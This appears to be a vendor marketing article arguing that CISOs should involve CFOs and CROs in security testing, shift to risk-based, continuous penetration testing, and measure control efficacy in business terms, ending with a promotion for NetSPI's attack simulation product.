Security professionals must communicate with finance and business leadership to better understand how the organization makes money. At the end of the day, that is what is core to your business and what we are ultimately protecting from cyber threats. Reshaping the way we think about security testing — moving from an engineering focus to a business risk perspective — can help us make more thoughtful decisions on which risks to prioritize, the cybersecurity activities to invest in and which business decisions have limited or negative ROI when incorporating cybersecurity implications.

To Validate And Champion For Cybersecurity Spend 

Cybersecurity is often viewed as a cost center, but it should be viewed as a business enabler. When putting your security controls to the test, looping in the CFO and CRO can be invaluable to validate spend and measure ROI. 

CFOs, CROs and the like have a unique understanding of loss potential and can help CISOs identify the level of security investment and resources necessary to protect the organization, in line with the organization’s risk appetite. 

A running list of vulnerabilities is not the only deliverable you receive following a penetration test. Not anymore, at least. Modern penetration testing models, such as penetration testing as a service (PTaaS), can help you validate your existing security controls (e.g., SIEM, EDR, firewalls) to thoroughly understand the scope of your control coverage.

“Do my controls give me the level of coverage I need to say that I’m effectively securing this value stream?” is the question that CISOs should ask themselves. Speaking the language of the C-suite — in dollars and cents — will help CISOs create security champions among the leadership team. In addition to reporting the critical vulnerabilities and how they are being remediated, showcase that each security investment is working as intended — or not — through your pentesting assessments.

To Shift Your Vulnerability Management Mindset

Today, there are organizations that still implement a “spray and pray” vulnerability management approach. They rely solely on automated scanners for their testing, without human context. Just as businesses are not created equal, all vulnerabilities are not created equal. It requires human intuition to identify the greatest risks to your business and prioritize the remediation efforts. Tech-enabled experts can bring that intuition to bear in an efficient way so as to enable greater coverage in both breadth and depth.

The threat landscape is constantly changing and testing annually is no longer good enough. Businesses are dynamic — CFOs and CROs know this well — so why don’t today’s testing strategies align with this?

Security testing is a critical component of the CFO’s and CRO’s roles as they focus on meeting the demands of regulatory bodies and auditors in their day-to-day work. An annual, check-the-box pentest may help them adhere to compliance requirements today, but those requirements are evolving. As a risk-based vulnerability management approach gains traction, continuous testing will become the standard.

Applications change and new releases are rapid-fire. Executives must be committed to investing in security, but also investing in process improvements that enable this type of testing to occur more frequently. Reduced friction security engagements can provide reassurances that unidentified risks are not making it into production with each feature release. Work with your CFOs and CROs to help them understand the concept of risk-based vulnerability management and establish a plan for always-on testing, such as implementing a pentesting strategy.  

The goal of security testing is no longer to find as many vulnerabilities as possible. It’s now shifting to a model where we are identifying the vulnerabilities that create the greatest risk to an organization in real time. Establishing relationships between security and risk/finance leadership is key to achieving a risk-based security testing program.

Discover how the NetSPI BAS solution helps organizations validate the efficacy of existing security controls and understand their Security Posture and Readiness.
